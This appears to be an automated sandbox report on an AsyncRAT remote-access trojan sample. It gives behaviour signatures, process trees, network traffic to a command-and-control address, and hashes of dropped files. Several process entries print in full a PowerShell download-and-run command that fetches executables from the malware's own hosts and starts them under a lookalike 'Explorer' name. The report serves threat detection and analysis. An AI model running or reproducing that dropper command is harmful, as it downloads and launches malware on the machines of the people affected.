Malware Analysis Report

2025-01-02 12:12

Sample ID 240417-nqkmvadd89
Target 2e5d5abda2f010c8c2cceeb6ff027cc3.exe
SHA256 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392
Tags rat default asyncrat
Score 10/10


Analysis Overview

Score 10/10

SHA256 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392

Threat Level: Known bad

The file 2e5d5abda2f010c8c2cceeb6ff027cc3.exe was found to be: Known bad.

Malicious Activity Summary

rat default asyncrat

Async RAT payload

AsyncRat

Asyncrat family

Checks computer location settings

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-17 11:36

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 11:36

Reported

2024-04-17 11:38

Platform

win7-20240215-en

Max time kernel

146s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"

Signatures

AsyncRat

rat asyncrat

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe C:\Windows\System32\cmd.exe
PID 2952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe C:\Windows\System32\cmd.exe
PID 2952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe C:\Windows\System32\cmd.exe
PID 3052 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe

"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
FR 51.254.53.24:4449 N/A tcp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
FR 51.254.53.24:4449 N/A tcp
FR 51.254.53.24:4449 N/A tcp
FR 51.254.53.24:4449 N/A tcp
FR 51.254.53.24:4449 N/A tcp
FR 51.254.53.24:4449 N/A tcp
FR 51.254.53.24:4449 N/A tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8d54200180804576414e8d710472b1f0
SHA1 54b14e2effe390f925c72eff8428411865c5323f
SHA256 8a97c800af4a71ad7e0699c8c7a8b096631d3bd7745d98110fb9f294255e4344
SHA512 bea043a056c53c2f51684f86ed9e1b1e8661631403e805358752e582d9acbdc94ccb8b6e5d91a2df2cb0969e89b7d5dcd0a73b04a02202daab78a38f300ea6e6

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 11:36

Reported

2024-04-17 11:38

Platform

win10v2004-20240412-en

Max time kernel

146s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"

Signatures

AsyncRat

rat asyncrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe

"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
FR 51.254.53.24:4449 N/A tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
FR 51.254.53.24:4449 N/A tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
FR 51.254.53.24:4449 N/A tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
FR 51.254.53.24:4449 N/A tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
FR 51.254.53.24:4449 N/A tcp
FR 51.254.53.24:4449 N/A tcp
FR 51.254.53.24:4449 N/A tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bunyhk2y.lbc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 e52ff3673869a8c21697e9cc80b586a9
SHA1 d86961b3dcd781a87ad6360bd69c0e4ad6ad3456
SHA256 4263e18a993ae6da36463829ecf6f02b13035555a6f83c6f9aa048cf1151f7cc
SHA512 70e7ffc8794613d45666be095dcdb22cea7b7ea27a910cdaee1f1d3a7e313b3b0cbf5bb0889cfa4cc9b7b93963302d259d73f7ed315b15f5d8d11c0e6b1d7ead

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eab4488871ac8f99a41386e5ffbb78ff
SHA1 552887e75c58595744ff3cbc0fcf0b0ef855b0aa
SHA256 dbff195e70764404bf89dd342f6eb991e377292f7de93f4791d397d2621dd279
SHA512 5670d6c233702f066776a44e7d194b9f388e02002b975fdfbc38ee0a41d778307e80a62678e26bee68a3b1aa11ca67c297408c5880abaa7cf3a70e00d7b09bfc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ab6a608d425ee999e520555e510f2856
SHA1 e8da9bcbd7dbf6cbe542cd27a683f27811851822
SHA256 44fb5a8164271cda3525070f3fa5f1b86db92ec1c3011f3233b7fce5126826b2
SHA512 3b5c9486b6da018a20c3d42876e821bff0560a5a51e0ede165ac5a2ef7e1f5152bd56e0e7849f4a92f2a3873bcec62afc84cb680a8d1adf42016dce00bacfb87

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ff65cdc439b64c97f807c217688786aa
SHA1 d57bd6d0a7390ede6056c768c7b0ad8249de554c
SHA256 d24255ef8f08aa0d0a35ba6371737ca124c5b421f3797e5cbd7838d3a746fb51
SHA512 75fce51496590db3fd58aad8dc1397760a2ac2c821649489ac12cf0ec754012186c6ecc177efa8c08ddeec3d3f47a7ef24f5e1f1b6380ddc59434293b4e5dd25
